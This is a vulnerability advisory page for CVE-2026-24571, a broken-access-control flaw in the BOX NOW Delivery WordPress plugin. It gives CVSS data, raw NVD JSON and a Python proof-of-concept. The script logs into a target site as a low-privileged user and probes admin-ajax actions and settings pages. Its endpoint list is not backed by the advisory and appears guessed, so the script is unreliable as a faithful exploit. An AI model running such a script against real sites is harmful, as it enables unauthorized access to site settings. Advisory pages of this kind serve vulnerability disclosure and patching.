Security Vulnerability Report
中文
CVE-2026-24571 CVSS 4.3 MEDIUM

CVE-2026-24571

Published: 2026-01-23 15:16:15
Last Modified: 2026-04-28 15:16:16

Description

Missing Authorization vulnerability in boxnow BOX NOW Delivery box-now-delivery allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects BOX NOW Delivery: from n/a through <= 3.0.2.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

box-now-delivery WordPress Plugin <= 3.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24571 PoC - BOX NOW Delivery Plugin Broken Access Control # Affected: box-now-delivery WordPress Plugin <= 3.0.2 # Type: Missing Authorization import requests import sys from urllib.parse import urljoin def exploit_cve_2026_24571(target_url, username, password): """ Exploit for Missing Authorization vulnerability in box-now-delivery plugin This PoC demonstrates how a low-privileged user can access admin functions """ session = requests.Session() # Step 1: Login as low-privileged user login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } resp = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful as low-privileged user") # Step 2: Try to access admin-only functionality # Common vulnerable endpoints in box-now-delivery plugin vulnerable_endpoints = [ '/wp-admin/admin-ajax.php?action=box_now_get_settings', '/wp-admin/admin-ajax.php?action=box_now_save_settings', '/wp-json/wp/v2/settings', '/wp-admin/admin.php?page=box-now-delivery-settings' ] for endpoint in vulnerable_endpoints: url = urljoin(target_url, endpoint) resp = session.get(url) # Check if access is granted without proper authorization if resp.status_code == 200 and 'box_now' in resp.text.lower(): print(f"[+] Vulnerable endpoint found: {endpoint}") print(f"[+] Response preview: {resp.text[:200]}...") return True print("[-] No vulnerable endpoints found") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://example.com subscriber password123") sys.exit(1) exploit_cve_2026_24571(sys.argv[1], sys.argv[2], sys.argv[3])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24571", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:15.067", "lastModified": "2026-04-28T15:16:15.657", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in boxnow BOX NOW Delivery box-now-delivery allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects BOX NOW Delivery: from n/a through <= 3.0.2."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en boxnow BOX NOW Delivery box-now-delivery permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a BOX NOW Delivery: desde n/a hasta &lt;= 3.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/box-now-delivery/vulnerability/wordpress-box-now-delivery-plugin-3-0-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}